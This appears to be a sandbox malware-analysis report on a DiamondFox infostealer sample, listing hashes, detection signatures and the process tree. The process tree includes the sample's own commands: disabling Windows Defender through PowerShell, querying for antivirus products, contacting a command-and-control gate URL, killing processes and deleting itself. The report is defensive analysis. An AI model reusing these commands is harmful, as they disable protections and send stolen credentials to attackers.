Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
148s -
max time network
150s -
platform
windows10_x64 -
resource
win10v20210408 -
submitted
03/07/2021, 23:55
General
-
Target
mixazed_20210703-205320.exe
-
Size
1.8MB
-
MD5
8703d31eadccffa270ba764a35dfd548
-
SHA1
6dd74fef8122095da64955abd99f38421629445d
-
SHA256
3ecf2f7b5f8f62572e6006aa6b0ad2c0b7df2bc1fc494f026608c2852113a187
-
SHA512
f8a878ca57208128dd2e9452ede5596aad819f2cab6d80fb71d7ea3baf1e6df540f28c000cbd64ecdd19e9fbb021ab03ea6050bc1f851a9524cf7d22ea4fd6a2
Score
10/10
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
XenArmor Suite
XenArmor is as suite of password recovery tools for various application.
-
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
-
DiamondFox payload 12 IoCs
Detects DiamondFox payload in file/memory.
-
NirSoft MailPassView 2 IoCs
Password recovery tool for various email clients
-
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
-
Nirsoft 6 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 13 IoCs
-
UPX packed file 4 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Loads dropped DLL 1 IoCs
-
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
-
Suspicious use of SetThreadContext 11 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Kills process with taskkill 4 IoCs
-
Opens file in notepad (likely ransom note) 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 32 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe"C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exeC:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exeC:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exeC:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe2⤵
-
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exeC:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe2⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe"C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 15⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List5⤵
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List5⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List5⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List5⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List5⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List5⤵
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"5⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
-
C:\Windows\notepad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe6⤵
- Opens file in notepad (likely ransom note)
-
-
C:\Windows\write.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe6⤵
-
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d85⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List5⤵
-
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List5⤵
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 2308 /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 1272 /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 2360 /F5⤵
- Kills process with taskkill
-
-
C:\Windows\SysWOW64\taskkill.exe"taskkill" /PID 3856 /F5⤵
- Kills process with taskkill
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\d1m5VMTVxQYJevtn.exe' -Force -Recurse4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\mixazed_20210703-205320.exe-a "C:\Users\Admin\AppData\Local\19f50722\plg\AZWebfys.json"3⤵
-
-
C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exe-a "C:\Users\Admin\AppData\Local\19f50722\plg\AZWebfys.json"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\Dv8Gy0Af.exe-a "C:\Users\Admin\AppData\Local\Temp\unk.xml"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\UFvoOnkW5oFfKmyk.exe"C:\Users\Admin\AppData\Local\Temp\UFvoOnkW5oFfKmyk.exe"3⤵
- Executes dropped EXE
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5.0MB
-
Filesize
5.0MB
-
Filesize
204KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
20KB
-
Filesize
496KB
-
Filesize
404KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
584KB
-
Filesize
4KB
-
Filesize
584KB
-
Filesize
1.6MB
-
Filesize
24KB
-
Filesize
4.9MB
-
Filesize
4.9MB
-
Filesize
76KB
-
Filesize
196KB
-
Filesize
136KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
4KB
-
Filesize
3.0MB
-
Filesize
3.0MB
-
Filesize
3.9MB
-
Filesize
3.9MB
-
Filesize
20KB
-
Filesize
340KB